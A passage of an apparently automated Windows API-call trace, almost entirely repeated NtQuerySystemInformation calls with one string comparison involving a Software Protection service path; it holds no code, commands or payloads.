ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0295.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7e0, Length=0x28, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0295.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0295.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e700, Length=0x20, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7c0, Length=0x20, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea40, Length=0x28, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0295.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0295.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0295.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0295.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0295.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea40, Length=0x28, ResultLength=0x0) [0295.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0295.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0295.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0295.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0295.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0295.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edb0, Length=0x28, ResultLength=0x0) [0295.629] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec00, Length=0x28, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0295.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0295.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.722] 